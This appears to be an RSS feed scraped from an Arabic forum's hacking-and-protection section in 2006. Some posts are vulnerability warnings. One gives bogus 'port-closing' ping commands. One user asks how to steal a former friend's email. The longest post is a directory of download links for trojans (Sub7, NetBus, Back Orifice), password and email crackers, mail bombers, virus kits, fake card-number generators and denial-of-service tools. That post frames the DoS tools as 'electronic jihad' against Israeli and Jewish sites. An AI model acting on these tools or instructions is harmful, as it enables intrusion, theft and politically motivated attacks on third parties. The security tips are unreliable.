			<td><img border="0" class="inlineimg" src="https://kwety.net/vb/5star/attach/rar.gif" alt="&lt;phrase 1=&quot;rar&quot;&gt;نوع الملف: %1$s&lt;/phrase&gt;" width="16" height="16">
	<a href="https://kwety.net/vb/attachment.php?attachmentid=5755" target="_blank">
kav6_license.rar&rlm;</a>&nbsp;&nbsp;
<input type="text" name="T2" size="25" style="font-size: 12pt; font-family: ms sans serif; border: 1px solid #444; background-color: #FFFDE2" value=" حجم الملف :  684 بايت">
<input type="text" name="T1" size="25" style="font-size: 12pt; font-family: ms sans serif; border: 1px solid #444; background-color: #FFFDE2" value="المشاهدات غير معروف">&nbsp;&nbsp;&nbsp;&nbsp; 
&nbsp;</td>
		</tr>
	</table>
			</table>
		</fieldset>
	

	</div>
]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>OK</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=32169</guid>
		</item>
		<item>
			<title>مهم تحذير من ثغرة</title>
			<link>https://kwety.net/vb/showthread.php?t=31323&amp;goto=newpost</link>
			<pubDate>Tue, 10 Oct 2006 17:14:03 GMT</pubDate>
			<description><![CDATA[السلام عليكم
 
 
 تحذير من ثغرة امنية خطيرة في الويندوز

 تم اكتشاف ثغرة امنية خطيرة في نظام التشغيل الويندوز تكمن الهكرز من التحكم الجهاز اسم الثغرة
 " Windows Metafile Flaw a 'Zero-Day Exploit "
 وقد تم اصدار رقعة لهذه الثغرة في موقع مايكروسوفت  الخميس لتنزيل 
الرقعة اذهب الى هذا الرابط 


http://www.microsoft.com/downloads/details.aspx?familyid=0C1B4C96-57AE-499E-B89B-215B7BB4D8E9‏&displaylang=en‏


ثم اضغط على زر Download‏ 
وسوف يتم تنزيلها 
 حجمها صغير حوالي 700 كيلو بايت وبعد التنزيل اضغط على 
الملف وابدا بتركيبها 
 

منقـــــــــول‏ للفائـــــده]]></description>
			<content:encoded><![CDATA[<div><font color="DarkGreen">السلام عليكم</font><br />
 <br />
 <br />
 تحذير من ثغرة امنية خطيرة في الويندوز<br />
<br />
 تم اكتشاف ثغرة امنية خطيرة في نظام التشغيل الويندوز تكمن الهكرز من التحكم الجهاز اسم الثغرة<br />
<font color="Red"> &quot; Windows Metafile Flaw a 'Zero-Day Exploit &quot;</font><br />
 وقد تم اصدار رقعة لهذه الثغرة في موقع مايكروسوفت  الخميس لتنزيل <br />
الرقعة اذهب الى هذا الرابط <br />
<br />
<br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=0C1B4C96-57AE-499E-B89B-215B7BB4D8E9‏&amp;displaylang=en‏" target="_blank">http://www.microsoft.com/downloads/d...isplaylang=en‏</a><br />
<br />
<br />
ثم اضغط على زر <font color="darkgreen">Download</font>‏ <br />
وسوف يتم تنزيلها <br />
 حجمها صغير حوالي 700 كيلو بايت وبعد التنزيل اضغط على <br />
الملف وابدا بتركيبها <br />
 <br />
<br />
منقـــــــــول‏ للفائـــــده</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>OK</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=31323</guid>
		</item>
		<item>
			<title>عـاجـل : ثـغـــرة فـي الـمـاسـنـجـر !!</title>
			<link>https://kwety.net/vb/showthread.php?t=31163&amp;goto=newpost</link>
			<pubDate>Sat, 07 Oct 2006 01:28:04 GMT</pubDate>
			<description>مصيبة وقد حدثت هذا
ومع البحث والتفتيش حول هذه المشكلة وجدت الاتى واليكم اخوانى نتيجة البحث وما وجدته على النت خير دليل على كلامى
الرجاء حذف ماسنجر Windows Live Messenger 8.0


فوراً رغم مميزاته الرائعه والمتعددة والرجوع للاصدار 7.5 



لمـــاذا ؟


بسبب اكتشاف ثغرة امنية


فعند استخدامك لهذا الاصدار يصبح جهازك مكشوفاً للمتطفلين الهكرز خاصةً ان البعض يترك الماسنجر مفتوح طوال الوقت عند استخدامه الـ DSL




ماهو سبب وجود هذه الثغرة؟ 


سبب وجود الثغرة هو وجود خطأ في البرمجة وهو خطأ في معالجة ملف الـ ctt والذي لم يتم ايجاد حل له حتى الان





مالذي قد يسببه هذا الخطأ؟


بالنسبة للملف ctt هو الذي يقوم بحفظ قائمة المتصلين Contact List وعند تشغيل الماسنجر سوف يتم طلب قائمة الاتصال من الملف ctt تلقائياً لعرضها لديك في الماسنجر


بالاضافة الى تمكين المتجسسين من الهاكرز اختراق جهازك فقد تتفاجأ حينما تجد ان قائمة الاتصال لديك محذوفه او نصفها على الاقل


مع ارق التحايا واعذبها

منقول للفائدة
</description>
			<content:encoded><![CDATA[<div><div align="right">مصيبة وقد حدثت هذا<br />
ومع البحث والتفتيش حول هذه المشكلة وجدت الاتى واليكم اخوانى نتيجة البحث وما وجدته على النت خير دليل على كلامى<br />
الرجاء حذف ماسنجر <font color="Red">Windows Live Messenger 8.0</font><br />
<br />
<br />
فوراً رغم مميزاته الرائعه والمتعددة والرجوع للاصدار 7.5 <br />
<br />
<br />
<br />
<font color="red">لمـــاذا ؟</font><br />
<br />
<br />
بسبب اكتشاف ثغرة <font color="red">امنية</font><br />
<br />
<br />
فعند استخدامك لهذا الاصدار يصبح جهازك مكشوفاً للمتطفلين الهكرز خاصةً ان البعض يترك الماسنجر مفتوح طوال الوقت عند استخدامه الـ <font color="red">DSL</font><br />
<br />
<br />
<br />
<br />
<font color="red">ماهو سبب وجود هذه الثغرة؟</font> <br />
<br />
<br />
<font color="red">سبب وجود الثغرة</font> هو وجود خطأ في البرمجة وهو خطأ في معالجة ملف الـ ctt والذي لم يتم ايجاد حل له حتى الان<br />
<br />
<br />
<br />
<br />
<br />
<font color="red">مالذي قد يسببه هذا الخطأ؟</font><br />
<br />
<br />
بالنسبة للملف ctt هو الذي يقوم بحفظ قائمة المتصلين Contact List وعند تشغيل الماسنجر سوف يتم طلب قائمة الاتصال من الملف ctt تلقائياً لعرضها لديك في الماسنجر<br />
<br />
<br />
بالاضافة الى تمكين المتجسسين من الهاكرز اختراق جهازك فقد تتفاجأ حينما تجد ان قائمة الاتصال لديك محذوفه او نصفها على الاقل<br />
<br />
<br />
مع ارق التحايا واعذبها<br />
<br />
منقول للفائدة</div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>VIP</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=31163</guid>
		</item>
		<item>
			<title><![CDATA[:: ][ :: كيفيه اقفااال جميع الطرق والسبل امام المخترق :: ][ ::]]></title>
			<link>https://kwety.net/vb/showthread.php?t=31124&amp;goto=newpost</link>
			<pubDate>Fri, 06 Oct 2006 01:22:58 GMT</pubDate>
			<description><![CDATA[بسم الله الرحمن الرحيم 
السلام عليكم ورحمه الله 
----------------------------------------
اول شيء بقوله انه الكثير منا قد يتخوف من الهاكر واكثر البرنامج ( الفايرول ) الجدار الناري قد تفى بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها ...... 

اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه . 

اتمنى اتباع الطريقه كما هي : 
إدهب إلى: 
Start>Run ابداء < تشغيل 

واكتب الامر التالي 
command.com 

ستظهر لك نافذة إكتب فيها: 
ping host 

و إضغط enter ثم إنتظر و اكتب: 
ping port 

و إضغط enter 

ثم إنتظر و اكتب: 
ping port1027 
وإضغط enter 
و إنتظر ثم إكتب: 
ping port80 

و إضغط enter 
ثم اكتب: 
ping proxy 
و إضغط enter 

ثم اكتب: 
ping port 
و إضغط enter 
و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في البروكسي الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية





---------------------------------------------------------------
الطريقة الأولى :- 


اتجه إلى ابدأ ثم اختر أمر تشغيل وعند 
ظهور النافدة اكتب الأمر كما هو مبين في الشكل : 
عندها سوف تظهر لك نافذة ملفات التسجيل . وسوف اكتب الخطوات 
بالترتيب . اتبع الخطوات التالية بالترتيب : 
اختر من الملفات : HKEY_LOCAL_MACHINE 
ثم : SOFTWARE 
ثم : MICROSOFT 
ثم : WINDOWS 
ثم : CURRENT VERSION 
ثم : RUN 

ملاحظة : في بعض الأحيان تجد اكثر من RUN كل ما عليك ان تبحث بها كلها 
عندما تضغط على ( RUN ) سوف تظهر على يمينك نافدة ملفات التسجيل وبها أوامر 
التسجيل وأسماء الملفات التي تعمل مع الويندوز ، ابحث عن أي ملف تجسس 
مثل ( patch.exe ) أو ( Explo32 ) ، وغيرها 
وعندما تجد تلك الملفات قم بمسحه فوراً ، وأعد تشغيل الكمبيوتر
 --------------------------------------------------------------------------------

ثانياً- الطريقة الثانية :- 

تعتبر هذه الطريقة أسهل الطرق ، وتستخدم عاده لكشف ملف 
التجسس عن طريق استخدام أوامر الدوس . 
اذهب لقائمة ابدأ ومن ثم البرامج واختر أمر تشغيل الدوس 
( MS-DOS موجّة ) واكتب هذا الأمر 
C:Windowsdir patch.* 
إذا وجدت ملف تجسس قم بمسحه فوراً بالأمر التالي : 
C:Windowsdelet patch.* 

--------------------------------------------------------------------------------

ثالثاً- الطريقة الثالثة :- 

اتجه إلى ابدأ ثم تشغيل وفي الخانة أكتب الأمر التالي : 
(msconfig) 

سوف تظهر لك نافذة وفي أعلاها عدة أوامر اختر الأمر : بدء التشغيل 
عندها سوف تظهر لك نافذة بها عدة مربعات وكل مربع به علامة . من هذه النافذة يمكنك 
إيقاف عمل أي برنامج وليس حدفه 

--------------------------------------------------------------------------------

رابعاً- الطريقة الرابعة :- 

للتعرف على من يخترق بجهازك في هذه اللحظة وذلك عن طريق الدوس ، اذهب لقائمة ابدأ ومن ثم البرامج واختر أمر تشغيل الدوس (MS-DOSموجّه) مع ملاحظة اتصالك بالانترنت وإغلاق جميع إطارات المتصفح وبرامج المحادثة بعدها قم بكتابة الأمر التالي : 
C:WINDOWSNETSTAT 
ثم اضغط مفتاح الإدخال ( ENTER ) 
في حالة وجود شخص ما مخترق جهازك في هذه الأثناء سيظهر رقم ( الآي بي ) الخاص به

منقول]]></description>
			<content:encoded><![CDATA[<div><font color="YellowGreen">بسم الله الرحمن الرحيم <br />
السلام عليكم ورحمه الله <br />
----------------------------------------<br />
اول شيء بقوله انه الكثير منا قد يتخوف من الهاكر واكثر البرنامج ( الفايرول ) الجدار الناري قد تفى بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها ...... <br />
<br />
اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات ( الثغرات الامنيه ) الموجوده بكل الاجهزه . </font><br />
<br />
<font color="DarkSlateBlue">اتمنى اتباع الطريقه كما هي : <br />
إدهب إلى: <br />
Start&gt;Run ابداء &lt; تشغيل <br />
<br />
واكتب الامر التالي <br />
command.com <br />
<br />
ستظهر لك نافذة إكتب فيها: <br />
ping host <br />
<br />
و إضغط enter ثم إنتظر و اكتب: <br />
ping port <br />
<br />
و إضغط enter <br />
<br />
ثم إنتظر و اكتب: <br />
ping port1027 <br />
وإضغط enter <br />
و إنتظر ثم إكتب: <br />
ping port80 <br />
<br />
و إضغط enter <br />
ثم اكتب: <br />
ping proxy <br />
و إضغط enter <br />
<br />
ثم اكتب: <br />
ping port <br />
و إضغط enter </font><br />
<font color="YellowGreen">و الآن إنتهت المهمة.. لقد قمت بتقفيل بورت في البروكسي الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الأمنية</font><br />
<br />
<br />
<br />
<br />
<br />
---------------------------------------------------------------<br />
<font color="yellowgreen">الطريقة الأولى :- </font><br />
<br />
<br />
<font color="yellowgreen">اتجه إلى ابدأ ثم اختر أمر تشغيل وعند <br />
ظهور النافدة اكتب الأمر كما هو مبين في الشكل : <br />
عندها سوف تظهر لك نافذة ملفات التسجيل . وسوف اكتب الخطوات </font><br />
<font color="DarkSlateBlue">بالترتيب . اتبع الخطوات التالية بالترتيب : <br />
اختر من الملفات : HKEY_LOCAL_MACHINE <br />
ثم : SOFTWARE <br />
ثم : MICROSOFT <br />
ثم : WINDOWS <br />
ثم : CURRENT VERSION <br />
ثم : RUN <br />
<br />
ملاحظة : في بعض الأحيان تجد اكثر من RUN كل ما عليك ان تبحث بها كلها <br />
عندما تضغط على ( RUN ) سوف تظهر على يمينك نافدة ملفات التسجيل وبها أوامر <br />
التسجيل وأسماء الملفات التي تعمل مع الويندوز ، ابحث عن أي ملف تجسس <br />
مثل ( patch.exe ) أو ( Explo32 ) ، وغيرها <br />
وعندما تجد تلك الملفات قم بمسحه فوراً ، وأعد تشغيل الكمبيوتر</font><br />
 --------------------------------------------------------------------------------<br />
<br />
<font color="YellowGreen">ثانياً- الطريقة الثانية :-</font> <br />
<br />
<font color="DarkSlateBlue">تعتبر هذه الطريقة أسهل الطرق ، وتستخدم عاده لكشف ملف <br />
التجسس عن طريق استخدام أوامر الدوس . <br />
اذهب لقائمة ابدأ ومن ثم البرامج واختر أمر تشغيل الدوس <br />
( MS-DOS موجّة ) واكتب هذا الأمر <br />
C:Windowsdir patch.* <br />
إذا وجدت ملف تجسس قم بمسحه فوراً بالأمر التالي : <br />
C:Windowsdelet patch.* </font><br />
<br />
--------------------------------------------------------------------------------<br />
<br />
<font color="YellowGreen">ثالثاً- الطريقة الثالثة :- </font><br />
<br />
<font color="DarkSlateBlue">اتجه إلى ابدأ ثم تشغيل وفي الخانة أكتب الأمر التالي : <br />
(msconfig) <br />
<br />
سوف تظهر لك نافذة وفي أعلاها عدة أوامر اختر الأمر : بدء التشغيل <br />
عندها سوف تظهر لك نافذة بها عدة مربعات وكل مربع به علامة . من هذه النافذة يمكنك <br />
إيقاف عمل أي برنامج وليس حدفه </font><br />
<br />
--------------------------------------------------------------------------------<br />
<br />
<font color="YellowGreen">رابعاً- الطريقة الرابعة :-</font> <br />
<br />
<font color="DarkSlateBlue">للتعرف على من يخترق بجهازك في هذه اللحظة وذلك عن طريق الدوس ، اذهب لقائمة ابدأ ومن ثم البرامج واختر أمر تشغيل الدوس (MS-DOSموجّه) مع ملاحظة اتصالك بالانترنت وإغلاق جميع إطارات المتصفح وبرامج المحادثة بعدها قم بكتابة الأمر التالي : <br />
C:WINDOWSNETSTAT <br />
ثم اضغط مفتاح الإدخال ( ENTER ) <br />
في حالة وجود شخص ما مخترق جهازك في هذه الأثناء سيظهر رقم ( الآي بي ) الخاص به</font><br />
<br />
<font color="Red">منقول</font></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>VIP</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=31124</guid>
		</item>
		<item>
			<title>الفزاع يا اخوان خوكم سليم ليبيى</title>
			<link>https://kwety.net/vb/showthread.php?t=30535&amp;goto=newpost</link>
			<pubDate>Mon, 25 Sep 2006 19:04:53 GMT</pubDate>
			<description>اول شيى كل عام وانت بخير  انا يا اخوانا فى حد من مصر سرق ايملى والله زعلت على شان كان صديقى ممكن طريقة اسرق ايملة وشكرا</description>
			<content:encoded><![CDATA[<div>اول شيى كل عام وانت بخير  انا يا اخوانا فى حد من مصر سرق ايملى والله زعلت على شان كان صديقى ممكن طريقة اسرق ايملة وشكرا</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>سليم ليبيا</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=30535</guid>
		</item>
		<item>
			<title>من هي أم راكان التي اخترقت موقع Google ؟؟؟ صورتها بالداخل</title>
			<link>https://kwety.net/vb/showthread.php?t=30126&amp;goto=newpost</link>
			<pubDate>Mon, 18 Sep 2006 07:09:44 GMT</pubDate>
			<description>في الأمس فتحت على الصفحة الرئيسية لموقع قوقل ... www.google.com وليس www.google.com.sa ... 
فوجدت هذه الصورة ... وهذا الكلام حدث في الصباح حوالي الساعة 9:25 ... 


صورة: http://www.kwety.net/kwety1/q89/Google-Hacked.jpg 



ويبدو أنها لسيدة تدعى أم راكان من ماليزيا ... 

تلاحظون أني ضغطت على الصورة بالزر الأيمن وذهبت إلى الخصائص ... 

الأمر أكبر مما تتصورون أيها الأخوة ... فلو صح ذلك فإنه يعتبر أمراً قاصماً بالنسبة لقوقل ... وسيتسبب ذلك بنزول سعره في سوق الأسهم بشكل كبير جداً ... وذلك أمر في غاية الأهمية بالنسبة إليهم ... 

فإذا كان لدى أي منكم أي معلومة حول هذا الموضوع فالرجاء أن يبلغني بها هنا 
</description>
			<content:encoded><![CDATA[<div><font color="Red"><div align="center">في الأمس فتحت على الصفحة الرئيسية لموقع قوقل ... <a href="http://www.google.com" target="_blank">www.google.com</a> وليس <a href="http://www.google.com.sa" target="_blank">www.google.com.sa</a> ... <br />
فوجدت هذه الصورة ... وهذا الكلام حدث في الصباح حوالي الساعة 9:25 ... <br />
<br />
<br />
<img src="http://www.kwety.net/kwety1/q89/Google-Hacked.jpg" border="0" alt="" /><br />
<br />
<br />
<br />
ويبدو أنها لسيدة تدعى أم راكان من ماليزيا ... <br />
<br />
تلاحظون أني ضغطت على الصورة بالزر الأيمن وذهبت إلى الخصائص ... <br />
<br />
الأمر أكبر مما تتصورون أيها الأخوة ... فلو صح ذلك فإنه يعتبر أمراً قاصماً بالنسبة لقوقل ... وسيتسبب ذلك بنزول سعره في سوق الأسهم بشكل كبير جداً ... وذلك أمر في غاية الأهمية بالنسبة إليهم ... <br />
<br />
فإذا كان لدى أي منكم أي معلومة حول هذا الموضوع فالرجاء أن يبلغني بها هنا </div></font></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>Nathyaa</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=30126</guid>
		</item>
		<item>
			<title>كل برامج اختراق مع شرح</title>
			<link>https://kwety.net/vb/showthread.php?t=29548&amp;goto=newpost</link>
			<pubDate>Tue, 05 Sep 2006 22:57:35 GMT</pubDate>
			<description><![CDATA[ارجو آن تستفدو
نبدآ
برامج الساب سفن
الشرح والتحميل
http://www.geocities.com/ala_kifk/p...rogrem_sub7.htm

برنامج sub seven GOLD
تحميل البرنامج
http://portwolf.hack3r.com/zips/sub72.1gold.zip
تعريب البرنامج
http://mypage.ayna.com/leza/21.s7m
شرح البرنامج
http://geocities.com/samysw/nowsub7.htm


برنامج sub seven BONUS
تحميل
البرمhttp://portwolf.hack3r.com/zips/sub7bonus.zip
تعريب البرنامج
http://mypage.ayna.com/leza/21.s7m
شرح البرنامج
http://geocities.com/samysw/nowsub7.htm


برامج النت بيوس
http://aljar7.4t.com/hpc.htm
شرح النت بيوس
http://aljar7.4t.com/nb.htm

برامج لأختراق الأجهزة تجدها هنا
http://jehad.itgo.com/com.htm



2ـ ][][أختراق البريدات][][

برنامج wwwhack
التحميل
http://faisalm.50megs.com/download/hack/wwwhack.zip
الشرح
http://www.ahliz.net/vb/showthread....90&pagenumber=1

وبرامج اخرى لأختراق البريد تجدها هنا
http://aljar7.4t.com/hemail.htm

صفحة اختراق البريد الالكتروني
http://jehad.itgo.com/email.htm


3ـ][][اختراق المواقع][][

برنامج wwwhack
التحميل
http://faisalm.50megs.com/download/hack/wwwhack.zip
الشرح1
http://aljar7.4t.com/whack1.htm
الشرح2
http://aljar7.4t.com/whack2.htm

برنامج WebCracker4.0
التحميل
http://www.haqerz.com/files/anti-le...ebCrack40.crack

الشرح
http://www.geocities.com/arabhacker2000/webcracker.htm


برنامج Brutus
التحميل
http://geocities.com/kaser01/brutus.jpg
الشرح
http://www.ahliz.net/vb/showthread....60&pagenumber=1

برنامج Unsecure2.1
التحميل
http://packetstorm.securify.com/Cra...NT/uns12exe.zip

الشرح
http://aljar7.4t.com/uns.htm
برامج خاصة بالمواقع تجدها هنا
http://jehad.itgo.com/web.htm




4ـ][][ضرب الايميل][][

طرق تدمير البريد تجدها هنا
http://www.geocities.com/eljehad/hackmail.htm

طرق تدمير البريد مع البرنامج وبالعربي
http://www.geocities.com/ala_kifk/drq_mail.htm

برنامج Kaboom
http://mypage.ayna.com/devil2k/kaboom30.zip

برنامج Euthan
http://mypage.ayna.com/devil2k/euthan15.zip

برنامج aenima
http://www.arabshacker.com/aenima.zip

برنامج upyours4beta3
http://members.nbci.com/hacknowledge/upyours4beta3.zip

برنامج sneaky Mail
http://members.nbci.com/hacknowledge/sneaky.zip

5ـ][][ضرب المواقع ][][

كيف تدمر سيرفرات المواقع اليهودية؟؟ هنا الجواب
http://www.home4arab.com/members//i...ews_servers.htm


برنامج الدرة الحربي للهجوم على المواقع الإسرائيلية ،،
تجده هنا مع الشرح
http://www.yaroun.8m.com/dorrah.htm

طريقة من طرق تدمير المواقع

افتح الدوس ومن ثم اكتب هذا الامر على سبيل المثال

ping http://xxxxxxx

بدل الأكسات اكتب اسم الموقع

تدمير المواقع بدون برامج للتدمير ،، هنا طريقة الشرح
http://www.geocities.com/ala_kifk/drq_battle.htm


6ـ][][سرقة الارقام السرية - الباسورد][][

BiosHackيخترق عدة انواع من البيوس
http://paragon.revoluti0n.org/Bios/bioshack.zip

ARJ لكسر الـ
http://www.hackpalace.com/cracking/...swords/arj1.zip


FTP للبحث فى الشبكة عن
http://*******club.com/km/files/hfi...check-0_31.perl


لاظهار ما تحت النجوم
http://paragon.revoluti0n.org/PassCrack/passthief.exe

7ـ][][قوائم عد - وورد لست][][

تستعمل فى بعض المواقع
http://paragon.revoluti0n.org/PassCrack/adult2lst.zip

اسماء ذكور
http://paragon.revoluti0n.org/PassCrack/male-names.zip


اسماء اناث
http://paragon.revoluti0n.org/PassC...emale-names.zip


لصناعة قائمة
http://*******club.com/km/files/pas...ts/dictmake.zip


لارقام الديجيتال
http://paragon.revoluti0n.org/PassCrack/4digits.zip


8ـ ][][ الفيروسات][][

،،، أدوات تصنيع الفيروسات ،،،إخطر الفيروسات والكثير
الكثير تجدها هنا // اخواني اخواتي ارجو اخذ الحذر عند
تنزيلها لانها قد تعطب الماذر بورد///

http://jehad.itgo.com/vairuses.htm

ملف يحتوي على 130 فيروس
http://www.vbzor.4t.com/w6/130vs.zip

برنامج لصناعة فيروسات (الديدان) مع شرح له
التحميل
http://www.virtue.nu/kaser/vbswg2.zip
الشرح
http://ahliz.net/vb/showthread.php3?threadid=5941


فيروسات خطيرة ادخل هنا ،، وربنا يستر
http://aljar7.4t.com/virus.htm



9ـ ][][سلسلة تعليم الهاكرز][][


مكتبة تحتوى على كتب للتعليم والشرح
http://e-jehad.8m.com/Library/index.html
تحتوي هذه المكتبة على سلسلة من الدروس و الكتب المتعلقة
بتعليم اختراق المواقع و البريد الإلكترني و الأجهزة ..
القسم قيد التطوير و التحديث .. نتمنى لكم حسن القراءة و
التعلم .. كما نسألكم الدعاء لكتاب و ناشري الدروس .. و
الله الموفق .

ملاحظة :- يفضل تنزيل الكتب و الدروس بدون برامج التنزيل
، لأنها قد لا تعمل .


وهنا عشرات الدروس وبالعربية ،، رائعة
http://www.geocities.com/ala_kifk/dros.htm

دروس بالعربية لأختراق المواقع تجدها هنا
http://www.geocities.com/eljehad1/learn.htm

دروس بالعربية لأختراق الأجهزة تجدها هنا
http://www.geocities.com/eljehad1/learn.htm

دروس بالعربية لتدمير المواقع تجدها هنا
http://www.geocities.com/eljehad1/learn.htm

وهنا مجموعة دروس باللغة الأنجليزية
http://www.geocities.com/eljehad1/learn.htm


][][انواع الهاكرز][][
http://aljar7.4t.com/hinfo.htm

بعض التوضيحات والدروس

ماالذي تستطيع فعله لكي تجاهد الكترونيا ؟
http://e-jehad.8m.com/Tips/e-jehad_HowTo.htm

الاختراق بدون سيرفر - باتش
http://www.ahliz.net/vb/showthread....41&pagenumber=1


ازالة تروجان برامج الهكرز
http://www.ahliz.net/vb/showthread.php3?threadid=1196

Nuke - نيوك
http://www.ahliz.net/vb/showthread....30&pagenumber=1


10ـ][][برامج منوعة][][

" برامج هاكينج عربية " بالاضافة إلى برنامج المجاهد الألكتروني تجدها هنا
http://e-jehad.8m.com/Hack/ArProgz/index.html

صنع أرقام الفيزا
http://www.geocities.com/ala_kifk/p...ogrem_visia.htm

برنامج مجاهدين النت ، برنامج عربي ،، وصلات التحميل في الأسفل

http://mypage.ayna.com/drmmm/mojahdin.zip

http://mypage.ayna.com/drmmm/mojahdin.exe

http://hrj.topcities.com/txt/program/MojahdinAlnet.zip

البرنامج لا يحتاج الى شرح فهو عربي كامل وما عليك الى ان تفتح البرنامج 
ثم 
تذهب الى قسم
(تدمير المواقع) وتنقر على كلمة (دمر الموقع)
يجب فتح اكثر من نافذة من البرنامج من 5الى10 نوافذ اي قم بتشغيل البرنامج 
والنقر على
ايقونتة اكثر من 5 مرات ثم قم بالذهاب الى قسم تدمير المواقع وانقر دمر 
الموقع 
في جميع
النوافذ التي فتحتها (عملية تكرار)
----------------------------------------------------------------
برنامج البوم بار
-----------------------
2- http bomber
وصلات التحميل :
http://www.geocities.com/eljehadfiles/bomber.zip

www.geocities.com/hagamat2002/bomber.zip

ww.geocities.com/eljehad1/bomber.zip

www.geocities.com/eljehad/site/bomber.zip

المزيد من المعلومات http://hrj.topcities.com/hrj2.htm

شرح البرنامج http://www.geocities.com/eljehad/exhtt.htm او
http://alkuds.tripod.com/boom.htm
---------------------------------------------------------------------------------------
3- win smurf
وصلات التحميل :
http://www.geocities.com/eljehadfiles/smurf.zip

mypage.ayna.com/lnt/winsmurf.zip

www.geocities.com/hagamat2002/smurf.zip

www.geocities.com/eljehad/site/smurf.zip

شرح البرنامج : http://www.home4arab.com/members/is...er6/roor/ws.htm او
http://www.geocities.com/eljehad/exw.htm



http://aljar7.4t.com/hpc.htm

برامج ][][BACK ORIFICE][][

http://aljar7.4t.com/hpc.htm



11ـ ][][ كيف تحمي نفسك من الأختراق][][

كيف تتم عملية الإختراق والحماية منه
http://www.geocities.com/ala_kifk/drs.htm

كيف تتخلص من الباتش
http://www.geocities.com/ala_kifk/patch.htm

أرسل رسالة مجهولة المصدر
http://www.pointofmail.com/sendnow/



سريل نمبرات لبرامج مايكروسوفت الشهيرة
تجدها هنا
http://aljar7.4t.com/info.htm

موقع لجمع الهكرز لصد اليهود
http://www.geocities.com/ala_kifk/


منتدى الكتائب//
http://www.alrakiza.com/ForumList.asp?UserNo=9399



كل البرامج التي يحتاجها الهكر
http://www.geocities.com/kfn99/hack.htm

وهنا كذلك تجد البرامج بترتيب ابجدي حسب اسم البرنامج
http://aljar7.4t.com/Trojany.htm

قمت بجمع المواد السابقة من هذه المواقع :ــ

سأكتبها لاحقا ،، لأن منها ما هو تحت التطوير 



الخلاصة // انما الأعمال بالنيات وأنما لكل امراء ما نوى …

خلاصة الخلاصة // لا تنسونا من صالح دعاكم ، والأهم اخواننا الاسرى 

.




كود فيروس الحب ،،، كن حذرا من نسخه للجهاز ،،

http://aljar7.4t.com/virus.htm

منقول من موقع الإرهاب الإسلامي للأخ صقر الكتائب 
http://www.erhap.com/vb


http://www.erhap.com/vb/showthread.php?threadid=1771]]></description>
			<content:encoded><![CDATA[<div>ارجو آن تستفدو<br />
نبدآ<br />
برامج الساب سفن<br />
الشرح والتحميل<br />
<a href="http://www.geocities.com/ala_kifk/p...rogrem_sub7.htm" target="_blank">http://www.geocities.com/ala_kifk/p...rogrem_sub7.htm</a><br />
<br />
برنامج sub seven GOLD<br />
تحميل البرنامج<br />
<a href="http://portwolf.hack3r.com/zips/sub72.1gold.zip" target="_blank">http://portwolf.hack3r.com/zips/sub72.1gold.zip</a><br />
تعريب البرنامج<br />
<a href="http://mypage.ayna.com/leza/21.s7m" target="_blank">http://mypage.ayna.com/leza/21.s7m</a><br />
شرح البرنامج<br />
<a href="http://geocities.com/samysw/nowsub7.htm" target="_blank">http://geocities.com/samysw/nowsub7.htm</a><br />
<br />
<br />
برنامج sub seven BONUS<br />
تحميل<br />
البرم<a href="http://portwolf.hack3r.com/zips/sub7bonus.zip" target="_blank">http://portwolf.hack3r.com/zips/sub7bonus.zip</a><br />
تعريب البرنامج<br />
<a href="http://mypage.ayna.com/leza/21.s7m" target="_blank">http://mypage.ayna.com/leza/21.s7m</a><br />
شرح البرنامج<br />
<a href="http://geocities.com/samysw/nowsub7.htm" target="_blank">http://geocities.com/samysw/nowsub7.htm</a><br />
<br />
<br />
برامج النت بيوس<br />
<a href="http://aljar7.4t.com/hpc.htm" target="_blank">http://aljar7.4t.com/hpc.htm</a><br />
شرح النت بيوس<br />
<a href="http://aljar7.4t.com/nb.htm" target="_blank">http://aljar7.4t.com/nb.htm</a><br />
<br />
برامج لأختراق الأجهزة تجدها هنا<br />
<a href="http://jehad.itgo.com/com.htm" target="_blank">http://jehad.itgo.com/com.htm</a><br />
<br />
<br />
<br />
2ـ ][][أختراق البريدات][][<br />
<br />
برنامج wwwhack<br />
التحميل<br />
<a href="http://faisalm.50megs.com/download/hack/wwwhack.zip" target="_blank">http://faisalm.50megs.com/download/hack/wwwhack.zip</a><br />
الشرح<br />
<a href="http://www.ahliz.net/vb/showthread....90&amp;pagenumber=1" target="_blank">http://www.ahliz.net/vb/showthread....90&amp;pagenumber=1</a><br />
<br />
وبرامج اخرى لأختراق البريد تجدها هنا<br />
<a href="http://aljar7.4t.com/hemail.htm" target="_blank">http://aljar7.4t.com/hemail.htm</a><br />
<br />
صفحة اختراق البريد الالكتروني<br />
<a href="http://jehad.itgo.com/email.htm" target="_blank">http://jehad.itgo.com/email.htm</a><br />
<br />
<br />
3ـ][][اختراق المواقع][][<br />
<br />
